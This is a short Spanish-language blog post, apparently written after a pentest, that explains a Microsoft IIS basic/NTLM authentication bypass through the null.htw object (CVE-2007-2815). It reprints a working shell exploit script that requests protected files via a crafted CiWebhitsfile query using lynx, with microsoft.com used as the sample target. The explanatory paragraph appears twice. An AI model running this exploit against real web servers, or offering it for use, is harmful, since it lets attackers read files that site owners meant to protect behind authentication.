Haciendo pentest sobre un Webserver di con un viejo problema el cual desconocía, con lo cual procedo a dejarme documentado en este post la info para explotar el problema.
Microsoft IIS ntlm and basic auth bypass
You can protect your web contents by adding ntfs acls, then you will be secure.
But you can protect your web contents by the Internet Information basic/ntlm autentication, then this will be bypassed with null.htw object.
Both authentications seem be the same, but really the object null.htw let users get any file in web directory, only if it is protected by the filesystem, will be secure.
In the exploit you can see how to use the null.htw object.
You can protect your web contents by adding ntfs acls, then you will be secure.
But you can protect your web contents by the Internet Information basic/ntlm autentication, then this will be bypassed with null.htw object.
Both authentications seem be the same, but really the object null.htw let users get any file in web directory, only if it is protected by the filesystem, will be secure.
In the exploit you can see how to use the null.htw object.
Código:
#!/bin/sh
#
# NTLM && BASIC AUTH BYPASS :)
#
# sha0[at]badchecksum.net
# Based on my adv: http://www.securityfocus.com/bid/24105/info
# (CVE-2007-2815)
if [ $# != 2 ]
then
printf "USAGE:\t\t$0 \nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n";
exit 0
fi
site=$1
protectedObject=$2
variabledatos=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&
CiRestriction=b&CiHiliteType=full'
lynx -dump $variabledatos
Fuente; badchecksum.net
Publicar un comentario